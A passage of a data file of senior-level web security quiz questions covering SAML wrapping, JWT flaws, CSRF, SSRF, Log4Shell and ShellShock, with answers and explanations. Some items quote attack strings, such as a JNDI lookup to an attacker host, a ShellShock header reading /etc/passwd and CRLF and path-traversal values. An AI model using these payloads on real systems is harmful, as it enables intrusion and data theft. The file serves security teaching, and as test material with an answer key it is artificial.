      'Mass assignment / over-posting; fix with explicit DTOs / strong-parameter allow-lists, never bind framework models directly to request bodies',
      'JWT injection; fix by rotating signing keys',
      'CSRF; fix by adding a token',
      'XSS; fix by output encoding',
    ],
    correctIndex: 0,
    explanation: 'Mass assignment (Rails) / over-posting (.NET) / parameter binding (Spring) is when the framework binds every request field to the model — including fields the user should not control. The fix is explicit DTOs with allow-lists of writable fields. OWASP API Security Top 10 lists this as API6:2023.',
    distractorRationale: {
      1: 'Token signing is unrelated to model binding.',
      2: 'CSRF tokens authenticate request origin, not field allow-listing.',
      3: 'Output encoding is for XSS, not server-side data binding.',
    },
    source: { name: 'OWASP API Security Top 10 — API6:2023 Unrestricted Resource Consumption / Mass Assignment guidance', url: 'https://owasp.org/API-Security/editions/2023/en/0xa6-unrestricted-access-to-sensitive-business-flows/' },
  },

  {
    id: 'web-028',
    topic: 'web',
    subtopic: 'saml',
    difficulty: 'senior',
    question: 'In a SAML signature wrapping (XSW) attack, what is the underlying bug that the attack exploits?',
    choices: [
      'The IdP signs an assertion, but the verifier evaluates a different (unsigned) assertion node injected elsewhere in the document because the signature reference and the validation read different XPath positions',
      'The IdP shares its private key with the SP',
      'The SAML response is sent over HTTP',
      'The SP uses a self-signed certificate',
    ],
    correctIndex: 0,
    explanation: 'SAML XSW exploits a mismatch between which element is signed and which element is consumed. The attacker wraps the signed assertion inside an envelope so the signature still verifies against the original, while the application reads a different attacker-controlled assertion. The fix is to enforce that signature verification and consumption operate on the same element. CISA, NIST, and the OASIS SAML profiles describe the canonical defences.',
    distractorRationale: {
      1: 'IdPs never share private keys; this is a strawman.',
      2: 'Transport security is independent of XSW; the attack works over HTTPS too.',
      3: 'Certificate self-signing is a trust-chain issue, not the XSW vulnerability.',
    },
    source: { name: 'OWASP — SAML Security Cheat Sheet', url: 'https://cheatsheetseries.owasp.org/cheatsheets/SAML_Security_Cheat_Sheet.html' },
  },

  {
    id: 'web-029',
    topic: 'web',
    subtopic: 'business-logic',
    difficulty: 'senior',
    question: 'An e-commerce checkout discounts items by 10% per coupon and allows multiple coupons. You add the same coupon code 12 times and the price goes negative, crediting your account. What category is this?',
    choices: [
      'SQL injection',
      'Business-logic vulnerability (insufficient validation of cumulative state) — not detectable by automated scanners; requires understanding the business rules to spot',
      'XSS',
      'XXE',
    ],
    correctIndex: 1,
    explanation: 'Business-logic flaws live in the gap between the developer\'s assumptions and what is actually enforced. They rarely show up in automated scans; you find them by modelling the workflow and abusing edge cases (negative quantities, currency wrap-around, duplicate coupons). OWASP\'s business-logic testing guidance is the senior-level reference.',
    distractorRationale: {
      0: 'No SQL is being injected.',
      2: 'XSS is client-side script execution.',
      3: 'XXE is XML entity processing.',
    },
    source: { name: 'PortSwigger Web Security Academy — Business logic vulnerabilities', url: 'https://portswigger.net/web-security/logic-flaws' },
  },

  {
    id: 'web-030',
    topic: 'web',
    subtopic: 'asvs',
    difficulty: 'senior',
    question: 'A senior pentester is asked which framework to use to define a comprehensive web-app security baseline (verifiable controls, not just findings). Which OWASP project is the canonical answer?',
    choices: [
      'OWASP Top 10 — it is a verification standard',
      'OWASP Application Security Verification Standard (ASVS) — defines testable security requirements at L1/L2/L3 maturity levels',
      'OWASP ZAP',
      'OWASP Juice Shop',
    ],
    correctIndex: 1,
    explanation: 'OWASP ASVS provides verifiable security requirements (V1 architecture through V14 configuration). The Top 10 is an awareness/risk list, not a verification standard. ZAP and Juice Shop are tools/labs. Knowing this distinction separates senior-level practitioners.',
    distractorRationale: {
      0: 'OWASP Top 10 is awareness, not a verification standard.',
      2: 'ZAP is a scanner.',
      3: 'Juice Shop is an intentionally vulnerable training app.',
    },
    source: { name: 'OWASP Application Security Verification Standard', url: 'https://owasp.org/www-project-application-security-verification-standard/' },
  },

  {
    id: 'web-031', topic: 'web', subtopic: 'dom-clobbering', difficulty: 'senior',
    question: 'A page reads `window.config.url` to decide where to redirect. There is no JavaScript that sets `config`. An attacker submits HTML containing `<a id="config"><a id="config" name="url" href="https://evil.com">`. What is happening?',
    choices: ['DOM Clobbering — DOM elements with `id`/`name` attributes become global properties on `window`/`document`, overwriting `config.url`', 'A reflected XSS', 'A CSRF token bypass', 'A cookie injection'],
    correctIndex: 0,
    explanation: 'HTML elements with id or name attributes become accessible as named properties on window/document. Attackers exploit this when JS reads global variables that were not explicitly set, forcing the JS to read attacker-controlled DOM nodes instead. PortSwigger documents the technique and defences.',
    distractorRationale: { 1: 'XSS executes script; here only HTML is injected to clobber globals.', 2: 'Tokens are not relevant to property-shadowing.', 3: 'Cookies are not set via DOM elements.' },
    source: { name: 'PortSwigger Web Security Academy — DOM Clobbering', url: 'https://portswigger.net/web-security/dom-based/dom-clobbering' },
  },

  {
    id: 'web-032', topic: 'web', subtopic: 'csp-bypass-jsonp', difficulty: 'senior',
    question: 'A page enforces `Content-Security-Policy: script-src \'self\' https://www.google.com`. Which classic bypass technique exists when JSONP endpoints exist on a whitelisted host?',
    choices: ['Use a whitelisted JSONP endpoint to load attacker-controlled JS via the callback parameter, since JSONP returns executable JavaScript from the trusted origin', 'Run the script over HTTP', 'Use eval()', 'Set document.domain'],
    correctIndex: 0,
    explanation: 'Whitelisting hosts that expose JSONP endpoints lets an attacker invoke `https://whitelisted/?callback=evil_js_payload` and the policy allows it because the script-src origin matches. Modern guidance is to use nonce-based or strict-dynamic CSP rather than allow-listing entire third-party origins. OWASP and Google\'s research detail many such bypasses.',
    distractorRationale: { 1: 'CSP enforces regardless of transport.', 2: 'unsafe-eval is needed for eval; that is a different policy concern.', 3: 'document.domain controls SOP relaxation, not CSP.' },
    source: { name: 'OWASP Content Security Policy Cheat Sheet', url: 'https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html' },
  },

  {
    id: 'web-033', topic: 'web', subtopic: 'cookie-prefix', difficulty: 'senior',
    question: 'You see a cookie set as `Set-Cookie: SID=abc; Path=/; Secure; HttpOnly`. The senior recommendation is to add a name prefix. Which prefix and what does it enforce?',
    choices: ['`__Host-` prefix — browsers reject the cookie unless it is Secure, has Path=/, and has no Domain attribute, preventing subdomain shadowing and insecure setting', '`__Public-` prefix to share across origins', '`__Insecure-` prefix to log misuse', '`__Cookie-` prefix to identify cookies'],
    correctIndex: 0,
    explanation: 'The `__Host-` prefix is enforced by browsers per the Cookie Prefixes spec. It guarantees the cookie was set over HTTPS, scoped to the exact host (no Domain attribute), and Path=/. `__Secure-` enforces only the Secure flag. Both raise the integrity bar of session cookies. MDN and the spec document this.',
    distractorRationale: { 1: 'There is no __Public- prefix.', 2: 'There is no __Insecure- prefix.', 3: 'There is no __Cookie- prefix.' },
    source: { name: 'MDN — Set-Cookie (Cookie prefixes)', url: 'https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie#cookie_prefixes' },
  },

  {
    id: 'web-034', topic: 'web', subtopic: 'padding-oracle', difficulty: 'senior',
    question: 'An app encrypts session tokens with AES-CBC and decrypts on incoming requests, returning a different error for "padding invalid" vs "decrypted but bad data". What attack does this enable and what is the fix?',
    choices: ['Padding oracle attack: the attacker manipulates ciphertext blocks and uses the differing error responses to byte-by-byte recover plaintext (or forge ciphertext). Fix: use authenticated encryption (AES-GCM) and return uniform error responses for any decryption failure', 'CSRF', 'Open redirect', 'XSS'],
    correctIndex: 0,
    explanation: 'CBC mode without authentication is vulnerable when the application leaks distinguishability between padding errors and other failures. Tools like padbuster automate the recovery. PortSwigger and OWASP cryptographic storage cheat sheet recommend AES-GCM (or libraries like Tink/libsodium) and uniform error handling.',
    distractorRationale: { 1: 'CSRF is request forgery, unrelated.', 2: 'Open redirect is URL manipulation.', 3: 'XSS executes script in browser.' },
    source: { name: 'OWASP Cryptographic Storage Cheat Sheet', url: 'https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html' },
  },

  {
    id: 'web-035', topic: 'web', subtopic: 'log4shell', difficulty: 'senior',
    question: 'CVE-2021-44228 (Log4Shell) is exploited by sending which kind of payload, and what is the underlying mechanism?',
    choices: ['A string like `${jndi:ldap://attacker/exp}` in any field that gets logged. Log4j 2 evaluates JNDI lookups in log messages and resolves the URL — fetching and deserialising/loading a remote class for RCE', 'A SQL injection in the log subsystem', 'An XSS in the log viewer', 'A buffer overflow in JVM'],
    correctIndex: 0,
    explanation: 'Log4j 2.x prior to patch evaluated `${jndi:...}` substitutions in log messages, fetching remote classes via LDAP/RMI/DNS. Any logged user-controlled field (HTTP headers, body, login form) became a remote-code-execution vector. Apache\'s advisory and CVE-2021-44228 detail the mechanism and full mitigation timeline.',
    distractorRationale: { 1: 'No SQL is involved.', 2: 'No log-viewer XSS path.', 3: 'No memory-corruption bug; this is a feature abuse.' },
    source: { name: 'Apache Log4j Security — CVE-2021-44228', url: 'https://logging.apache.org/log4j/2.x/security.html' },
  },

  {
    id: 'web-036', topic: 'web', subtopic: 'spring4shell', difficulty: 'senior',
    question: 'Spring4Shell (CVE-2022-22965) abuses what feature, and on which configuration is it most dangerous?',
    choices: ['Spring Framework data binding via `class.module.classLoader.*` properties on a controller bound to a request body, exploitable on Tomcat-deployed apps using JDK 9+, allowing the attacker to write a JSP webshell into the Tomcat docroot', 'A Java deserialisation gadget in Hibernate', 'A SSRF in Spring Cloud Gateway', 'A ZIP slip in Spring Boot'],
    correctIndex: 0,
    explanation: 'Spring\'s parameter binding allowed setting nested properties up the class chain on JDK 9+, including the Tomcat ClassLoader. An attacker could rewrite log file paths to drop a JSP shell into the webroot. Spring\'s advisory and VMware\'s patch notes describe the exact prerequisites.',
    distractorRationale: { 1: 'That is a separate Spring deserialisation issue.', 2: 'Spring Cloud Gateway SSRF is CVE-2022-22947 — different.', 3: 'Zip slip is path-traversal during archive extraction — unrelated.' },
    source: { name: 'Spring Blog — CVE-2022-22965 advisory', url: 'https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement' },
  },

  {
    id: 'web-037', topic: 'web', subtopic: 'iis-shortname', difficulty: 'senior',
    question: 'IIS short-filename (8.3) disclosure allows an attacker to enumerate file names using which character?',
    choices: ['The tilde `~` — sending requests like `/admi~1.aspx` lets the attacker confirm whether files starting with `admi` exist and reveals the 8.3 short name, useful for hidden file discovery', 'The hash `#`', 'The dollar `$`', 'The pipe `|`'],
    correctIndex: 0,
    explanation: 'When 8.3 short-name generation is enabled (default on older IIS/Windows), IIS exposes a side channel: requests with the `~1` short-name suffix produce different responses depending on whether a matching file exists. The fix is `fsutil 8dot3name set 1` and IIS hardening. Microsoft and OWASP testing guide document this.',
    distractorRationale: { 1: '# is a fragment indicator.', 2: '$ has no IIS short-name role.', 3: '| has no IIS short-name role.' },
    source: { name: 'OWASP Web Security Testing Guide — IIS specific tests', url: 'https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/' },
  },

  {
    id: 'web-038', topic: 'web', subtopic: 'exposed-git', difficulty: 'senior',
    question: 'You request `https://target.tld/.git/config` and it returns content. What is the impact and how is it typically exploited?',
    choices: ['The whole `.git/` repository may be reachable; tools like `git-dumper` reconstruct the codebase from object files. The repo often contains hardcoded secrets, config, and private code that hugely accelerates further attack', 'Browser cache poisoning', 'CORS bypass', 'CSRF token theft'],
    correctIndex: 0,
    explanation: 'Public web roots that include the .git directory leak the entire version history. Open-source dumpers walk the pack/loose objects via HTTP and reconstruct working trees. OWASP testing guide and many bug-bounty writeups treat this as critical when secrets are present.',
    distractorRationale: { 1: 'Cache poisoning is unrelated.', 2: 'CORS is browser SOP, unrelated to .git exposure.', 3: 'CSRF is browser-issued requests.' },
    source: { name: 'OWASP Web Security Testing Guide — Test File Extensions Handling for Sensitive Information', url: 'https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/03-Test_File_Extensions_Handling_for_Sensitive_Information' },
  },

  {
    id: 'web-039', topic: 'web', subtopic: 'shellshock', difficulty: 'senior',
    question: 'ShellShock (CVE-2014-6271) made HTTP CGI environments running Bash exploitable via what vector?',
    choices: ['Bash evaluated trailing function definitions in environment variables (`() { :; }; <commands>`); CGI scripts pass HTTP headers (e.g., User-Agent) into env vars, so a crafted header executed arbitrary commands as the web server', 'A buffer overflow in nginx', 'A Java deserialisation flaw', 'An XSS in Bash'],
    correctIndex: 0,
    explanation: 'Bash <4.3 parsed trailing commands after function definitions in environment variables. CGI scripts populate env from HTTP headers, so a User-Agent like `() { :; }; /bin/cat /etc/passwd` triggered RCE. CVE-2014-6271 and the original advisories document the mechanism and the patch timeline.',
    distractorRationale: { 1: 'nginx is not Bash.', 2: 'Java deserialisation is a different bug class.', 3: 'XSS targets browsers.' },
    source: { name: 'NIST NVD — CVE-2014-6271 (ShellShock)', url: 'https://nvd.nist.gov/vuln/detail/CVE-2014-6271' },
  },

  {
    id: 'web-040', topic: 'web', subtopic: 'http-parameter-pollution', difficulty: 'senior',
    question: 'HTTP Parameter Pollution (HPP) is exploitable in what scenario?',
    choices: ['When two layers (e.g., WAF + back-end, or front-end + business logic) parse repeated parameters differently — the attacker submits `?role=user&role=admin` and one layer sees one value while the other sees the other', 'When TLS is misconfigured', 'When cookies are missing HttpOnly', 'When CSRF tokens are absent'],
    correctIndex: 0,
    explanation: 'Different parsers handle duplicate parameters differently (first-wins, last-wins, concatenation). Attackers exploit the disagreement between security layers (WAF) and application logic. OWASP\'s HPP guidance covers the basics.',
    distractorRationale: { 1: 'TLS does not parse parameters.', 2: 'HttpOnly is cookie scope, unrelated.', 3: 'CSRF tokens are a different control.' },
    source: { name: 'OWASP — Testing for HTTP Parameter Pollution', url: 'https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/04-Testing_for_HTTP_Parameter_Pollution' },
  },

  {
    id: 'web-041', topic: 'web', subtopic: 'crlf-injection', difficulty: 'senior',
    question: 'A redirect endpoint reflects a parameter into the `Location` HTTP header. The attacker sends `?next=foo%0d%0aSet-Cookie:%20admin=1`. What attack class is this?',
    choices: ['CRLF injection / HTTP response splitting — by injecting raw \\r\\n the attacker can append additional headers (Set-Cookie, cache directives) or even split a response, leading to cache poisoning, session fixation, or XSS via injected body', 'A buffer overflow', 'A path traversal', 'A SQL injection'],
    correctIndex: 0,
    explanation: 'CRLF injection occurs when user input flows into HTTP headers without sanitisation of \\r\\n. The injected sequence terminates the current header and starts a new one. OWASP\'s CRLF testing guide and PortSwigger\'s response splitting material describe both modern (cache poisoning) and legacy (response splitting) variants.',
    distractorRationale: { 1: 'Buffer overflows are memory issues, not header parsing.', 2: 'Path traversal hits the filesystem.', 3: 'SQLi targets databases.' },
    source: { name: 'OWASP — Testing for HTTP Splitting/Smuggling (CRLF Injection)', url: 'https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Splitting_Smuggling' },
  },

  {
    id: 'web-042', topic: 'web', subtopic: 'reset-token-referer', difficulty: 'senior',
    question: 'A password-reset email link includes the reset token in the URL path. After clicking, the page loads third-party analytics scripts. Why is this a senior-level finding?',
    choices: ['The browser sends the full reset URL (token included) as the `Referer` header to every third-party resource loaded by the reset page, leaking the token to analytics, ad networks, and CDNs that could log or be compromised. Fix: keep the token in the URL only briefly, then redirect to a token-less form, or use POST', 'It is a CSRF vulnerability', 'It is a buffer overflow', 'It is a SQLi'],
    correctIndex: 0,
    explanation: 'OWASP\'s Forgot Password cheat sheet documents this exact leakage vector. Tokens in URL paths leak via Referer to every cross-origin resource. The fix is to redirect quickly to a token-less form, or use a POST-based form with the token in the body.',
    distractorRationale: { 1: 'CSRF is request forgery; this is information disclosure.', 2: 'No memory-corruption involvement.', 3: 'No DB query.' },
    source: { name: 'OWASP Forgot Password Cheat Sheet', url: 'https://cheatsheetseries.owasp.org/cheatsheets/Forgot_Password_Cheat_Sheet.html' },
  },

  {
    id: 'web-043', topic: 'web', subtopic: 'breach', difficulty: 'senior',
    question: 'BREACH attack targets what kind of secret in a web response?',
    choices: ['Reflected secrets (CSRF tokens, OAuth state) embedded in HTML responses that are HTTP-compressed (gzip/deflate). By guessing characters and observing compressed-length differences, attackers extract the secret. Mitigations: disable HTTP compression on responses with secrets, randomise reflected content, or ensure secrets are not reflected in the body', 'TLS session keys directly', 'Browser cache contents', 'DNS responses'],
    correctIndex: 0,
    explanation: 'BREACH (CRIME\'s HTTP-level cousin) leaks compressed-body secrets via observable length differences across guesses. The breachattack.com paper and follow-on research describe both detection and mitigations. Many frameworks now masking-pad CSRF tokens to defeat it.',
    distractorRationale: { 1: 'TLS keys are not the target; reflected body content is.', 2: 'Cache is not the channel.', 3: 'BREACH operates over HTTP responses, not DNS.' },
    source: { name: 'BREACH attack — Black Hat USA 2013 paper (canonical reference)', url: 'http://breachattack.com/' },
  },

  {
    id: 'web-044', topic: 'web', subtopic: 'idn-homograph', difficulty: 'senior',
    question: 'An attacker registers `аpple.com` (Cyrillic а). What attack class is this and what makes it work?',
    choices: ['IDN homograph attack — Unicode characters that look identical to ASCII (Cyrillic а vs Latin a) are encoded via Punycode (`xn--...`); browsers may display the Unicode form, deceiving users. Browser policies (display Punycode for mixed scripts) mitigate but do not eliminate it', 'It is a buffer overflow', 'It is a CSRF', 'It is a JWT confusion'],
    correctIndex: 0,
    explanation: 'IDN (Internationalised Domain Name) homographs leverage visually similar code points across scripts. Browsers apply heuristics (per Mozilla\'s IDN display policy or Chrome\'s rules) to display Punycode when scripts mix suspiciously. Phishing combined with sub-CA misissuance has been a recurring concern.',
    distractorRationale: { 1: 'Memory corruption is unrelated.', 2: 'CSRF is request forgery.', 3: 'JWT confusion is signature-related.' },
    source: { name: 'Mozilla — IDN Display Algorithm', url: 'https://wiki.mozilla.org/IDN_Display_Algorithm' },
  },

  {
    id: 'web-045', topic: 'web', subtopic: 'tabnabbing', difficulty: 'senior',
    question: 'A user clicks `<a href="https://attacker" target="_blank">link</a>` on your site. What is the attack and the modern default browser behaviour?',
    choices: ['Reverse tabnabbing — the new tab can use `window.opener.location` to rewrite the original tab to a phishing page. Modern browsers default `target="_blank"` to imply `rel="noopener"`, but legacy or non-browser clients may not, so explicitly setting `rel="noopener noreferrer"` is the recommended hardening', 'A CSP bypass', 'A CORS bypass', 'A clickjacking'],
    correctIndex: 0,
    explanation: 'Reverse tabnabbing was a common phishing primitive before browsers updated defaults. Even with modern defaults, OWASP and web.dev recommend `rel="noopener noreferrer"` for explicit safety, especially on sensitive sites or when supporting older clients. MDN documents the change.',
    distractorRationale: { 1: 'CSP enforces script policy.', 2: 'CORS governs XHR.', 3: 'Clickjacking uses iframes.' },
    source: { name: 'web.dev — External anchors should use rel="noopener"', url: 'https://web.dev/external-anchors-use-rel-noopener/' },
  },

  {
    id: 'web-046', topic: 'web', subtopic: 'postmessage', difficulty: 'senior',
    question: 'A parent page calls `iframe.contentWindow.postMessage(token, "*")`. Why is `*` dangerous and what is the fix?',
    choices: ['`"*"` allows the message to be delivered to any origin currently loaded in the iframe — if the iframe was navigated to attacker content, the token is leaked. Always specify the exact target origin in postMessage and verify `event.origin` on the receiving side', 'It enables CORS', 'It disables HSTS', 'It blocks all cross-origin reads'],
    correctIndex: 0,
    explanation: 'postMessage\'s second argument specifies the target origin; `"*"` disables that check and lets any origin loaded in the target receive the data. MDN and OWASP both recommend always specifying the target origin and validating origin on receive.',
    distractorRationale: { 1: 'CORS is independent of postMessage.', 2: 'HSTS is unrelated.', 3: 'It is a sender-side control, not receiver.' },
    source: { name: 'MDN — Window.postMessage()', url: 'https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage' },
  },

  {
    id: 'web-047', topic: 'web', subtopic: 'service-worker', difficulty: 'senior',
    question: 'An attacker who can upload a JS file to `https://target.tld/uploads/sw.js` exploits which feature for persistent compromise?',
    choices: ['They register a Service Worker scoped to `/`, which then proxies every same-origin fetch and persists across reloads. Mitigations: serve uploads from a different origin or with the `Service-Worker-Allowed` header restricted, and disallow uploaded JS files to be served with executable MIME', 'They register a CORS policy', 'They register a CSP nonce', 'They register a CSRF token'],
    correctIndex: 0,
    explanation: 'Service Workers can intercept network traffic on the registered scope and persist offline. Allowing arbitrary JS uploads on the same origin lets an attacker plant a long-lived MITM. OWASP\'s Service Worker guidance and W3C spec describe the registration model and `Service-Worker-Allowed` controls.',
    distractorRationale: { 1: 'CORS is server-side.', 2: 'CSP nonce is per-page.', 3: 'CSRF is request forgery.' },
    source: { name: 'MDN — Service Worker API & Service-Worker-Allowed header', url: 'https://developer.mozilla.org/en-US/docs/Web/API/Service_Worker_API' },
  },

  {
    id: 'web-048', topic: 'web', subtopic: 'websocket', difficulty: 'senior',
    question: 'A WebSocket server authenticates the upgrade handshake using a session cookie. What additional check is required to prevent Cross-Site WebSocket Hijacking (CSWSH)?',
    choices: ['Validate the `Origin` header on the WebSocket upgrade request — browsers send the originating site\'s origin, and the server should reject unknown origins. Otherwise an attacker page can open a WebSocket to your endpoint with the victim\'s cookie attached', 'Use HTTPS only', 'Increase TCP keepalive', 'Reduce idle timeout'],
    correctIndex: 0,
    explanation: 'CSWSH is the WebSocket cousin of CSRF. The upgrade is a regular HTTP request that includes cookies if SameSite permits. Without origin validation, attacker pages can open authenticated sockets on the victim\'s behalf. PortSwigger and OWASP cover both detection and mitigation.',
    distractorRationale: { 1: 'TLS does not authenticate origin.', 2: 'Keepalive is connection management.', 3: 'Timeout is operational, not security.' },
    source: { name: 'PortSwigger Web Security Academy — WebSockets', url: 'https://portswigger.net/web-security/websockets' },
  },

  {
    id: 'web-049', topic: 'web', subtopic: 'jwt-none', difficulty: 'senior',
    question: 'A JWT verifier accepts `{"alg":"none"}` tokens. What is the impact?',
    choices: ['An attacker can mint any payload (including admin claims) with no signature at all, since `alg=none` instructs the verifier to skip signature verification — a complete authentication bypass. The fix is to enforce a strict allow-list of accepted algorithms server-side', 'A CSRF', 'A path traversal', 'A clickjacking'],
    correctIndex: 0,
    explanation: 'The `none` algorithm exists in RFC 7519 for unsigned JWTs and historically caught many libraries off-guard when servers accepted whatever algorithm the token declared. The mitigation is well-known: pin the expected algorithm server-side. PortSwigger and Auth0 document this.',
    distractorRationale: { 1: 'CSRF is request forgery.', 2: 'Traversal hits the filesystem.', 3: 'Clickjacking is iframe-based.' },
    source: { name: 'PortSwigger Web Security Academy — JWT (alg=none)', url: 'https://portswigger.net/web-security/jwt' },
  },

  {
    id: 'web-050', topic: 'web', subtopic: 'jwt-kid', difficulty: 'senior',
    question: 'A JWT library trusts the `kid` (key id) header to look up the verification key in a directory: `/keys/<kid>.pem`. What attack does this enable?',
    choices: ['Path traversal via kid (e.g., `kid: ../../dev/null`) to make the verifier load attacker-chosen content (or a known/empty key), or SQLi if `kid` is used in a DB lookup. Always treat `kid` as untrusted input', 'It enables HSTS', 'It enables Subresource Integrity', 'It enables WebAuthn'],
    correctIndex: 0,
    explanation: 'The `kid` header is attacker-controlled. Naïve implementations have been exploited via path traversal (loading /dev/null as the key) and SQL injection on key lookup. Auth0 and PortSwigger document both.',
    distractorRationale: { 1: 'HSTS is transport security.', 2: 'SRI is for resource integrity.', 3: 'WebAuthn is unrelated.' },
    source: { name: 'PortSwigger Web Security Academy — JWT (kid injection)', url: 'https://portswigger.net/web-security/jwt' },
  },

  {
    id: 'web-051', topic: 'web', subtopic: 'jwt-jku', difficulty: 'senior',
    question: 'A JWT verifier honours the `jku` (JWK Set URL) header. Why is that dangerous?',
    choices: ['`jku` lets the token tell the verifier where to fetch the public key. An attacker hosts a JWK set on their own server, signs a token with the matching private key, and points `jku` at their URL — the verifier fetches it and validates successfully. Mitigation: ignore jku entirely, or restrict it to a strict allow-list', 'It causes session fixation', 'It triggers CSRF', 'It triggers XXE'],
    correctIndex: 0,
    explanation: 'The `jku` (and similarly `x5u`) headers can fool naive verifiers into trusting an attacker-controlled key URL. Hardened JWT libraries either ignore these or only accept allow-listed URLs. Auth0\'s blog and the JOSE spec both document the constraints.',
    distractorRationale: { 1: 'Session fixation is unrelated to JWT verification.', 2: 'CSRF is request forgery.', 3: 'XXE is XML entity processing.' },
    source: { name: 'Auth0 — Critical vulnerabilities in JSON Web Token libraries (jku/x5u)', url: 'https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/' },
  },

  {
    id: 'web-052', topic: 'web', subtopic: 'second-order-sqli', difficulty: 'senior',
    question: 'A signup form stores a username in DB; later, a different feature concatenates that stored username into a query without parameterisation. What kind of SQLi is this?',
    choices: ['Second-order SQL injection — the malicious data is stored cleanly in one path then triggers injection when read and concatenated by another path. Detection is harder because the injection point is decoupled from the input point', 'Time-based SQLi only', 'Reflected XSS', 'CRLF injection'],
    correctIndex: 0,
    explanation: 'Second-order injection separates the storage step from the trigger step. Many WAFs and developers focus on direct injection paths and miss it. The OWASP testing guide and PortSwigger cover detection patterns.',
    distractorRationale: { 1: 'Time-based is a detection technique, not a class.', 2: 'XSS is client-side.', 3: 'CRLF affects HTTP headers.' },
    source: { name: 'OWASP Web Security Testing Guide — Testing for SQL Injection', url: 'https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection' },
  },

  {
    id: 'web-053', topic: 'web', subtopic: 'mxss', difficulty: 'senior',
    question: 'mXSS (mutation XSS) succeeds because of which browser behaviour?',
    choices: ['When the browser parses then re-serialises HTML (e.g., assigning innerHTML), it can mutate the DOM in ways the sanitiser did not anticipate, turning safe-looking input into executable script after re-parsing. Defence: use trusted sanitisers (DOMPurify) that account for mutation, or Trusted Types', 'It is a CSP bypass', 'It is a CORS bypass', 'It is a CSRF'],
    correctIndex: 0,
    explanation: 'mXSS exploits subtle differences between HTML parsing and serialisation. Cure53\'s research formalised the class. Modern defence is to use DOMPurify or Trusted Types policies which validate after the browser\'s mutation step.',
    distractorRationale: { 1: 'CSP is a policy header.', 2: 'CORS is XHR control.', 3: 'CSRF is request forgery.' },
    source: { name: 'OWASP DOM-based XSS Prevention Cheat Sheet', url: 'https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html' },
  },

  {
    id: 'web-054', topic: 'web', subtopic: 'csrf-double-submit', difficulty: 'senior',
    question: 'Which CSRF mitigation strategy is OWASP\'s primary recommendation for non-API web apps in 2024?',
    choices: ['Synchroniser token pattern (per-session or per-request anti-CSRF token tied to the user session) plus SameSite cookie hardening; double-submit cookie is acceptable but weaker if subdomain trust is broken', 'Adding HSTS only', 'Disabling JavaScript', 'Using only HTTP/2'],
    correctIndex: 0,
    explanation: 'OWASP\'s CSRF Prevention Cheat Sheet ranks synchroniser tokens as the primary defence (with SameSite as defence in depth). Double-submit cookie is listed as a secondary option with caveats around subdomain compromise. Custom request-header checks work for fetch/XHR.',
    distractorRationale: { 1: 'HSTS is transport security.', 2: 'Disabling JS is impractical.', 3: 'HTTP version is unrelated.' },
    source: { name: 'OWASP CSRF Prevention Cheat Sheet', url: 'https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html' },
  },

  {
    id: 'web-055', topic: 'web', subtopic: 'csrf-origin-check', difficulty: 'senior',
    question: 'For an XHR/fetch-based API, OWASP recommends which lightweight CSRF defence in addition to or instead of tokens?',
    choices: ['Verifying the `Origin` (preferred) or `Referer` header server-side against an allow-list — XHR/fetch always sends Origin on cross-origin and same-origin POSTs, and browsers block JavaScript from setting Origin, so the value is trustworthy if SameSite or CORS is configured properly', 'Adding a HEAD request before each POST', 'Forcing UDP transport', 'Setting cookies to TTL=0'],
    correctIndex: 0,
    explanation: 'OWASP\'s CSRF cheat sheet endorses Origin/Referer verification as a "verify same-origin with standard headers" defence, especially useful for stateless APIs. Browsers do not let JavaScript set Origin, so it is a reliable signal under CORS-honoring contexts.',
    distractorRationale: { 1: 'HEAD does not authenticate origin.', 2: 'UDP is unrelated.', 3: 'TTL=0 invalidates session.' },
    source: { name: 'OWASP CSRF Prevention Cheat Sheet — Verifying Origin', url: 'https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#identifying-source-origin-via-originreferer-header' },
  },

  {
    id: 'web-056', topic: 'web', subtopic: 'ssrf-aws-imds', difficulty: 'senior',
    question: 'An SSRF on an AWS-hosted app fetches `http://169.254.169.254/latest/meta-data/iam/security-credentials/<role>`. What is the standard hardening AWS now recommends?',
    choices: ['IMDSv2 — session-token-based metadata retrieval that requires a PUT request to obtain a token, rendering most simple GET-based SSRFs ineffective. Enforced via instance metadata options', 'Disable IPv6', 'Require HTTPS to the metadata service', 'Use longer IAM role names'],
    correctIndex: 0,
    explanation: 'IMDSv2 mandates a PUT/GET handshake (with X-aws-ec2-metadata-token-ttl-seconds), defeating naïve SSRF that can only do GETs and cannot set arbitrary headers. AWS publishes guidance and tools to enforce IMDSv2 fleet-wide.',
    distractorRationale: { 1: 'IPv6 is not the metadata channel.', 2: 'Metadata uses HTTP intentionally; HTTPS is not required.', 3: 'Role name length is irrelevant.' },
    source: { name: 'AWS — Use IMDSv2 (instance metadata service)', url: 'https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-IMDS-existing-instances.html' },
  },

  {
    id: 'web-057', topic: 'web', subtopic: 'ssrf-azure-imds', difficulty: 'senior',
    question: 'Azure\'s Instance Metadata Service requires which header on every request, and how does that mitigate SSRF?',
    choices: ['`Metadata: true` — the service refuses requests lacking this header; many SSRF primitives cannot inject custom request headers, so Azure IMDS is naturally hardened against simple URL-only SSRFs', 'Authorization Bearer', 'X-CSRF-Token', 'Cookie'],
    correctIndex: 0,
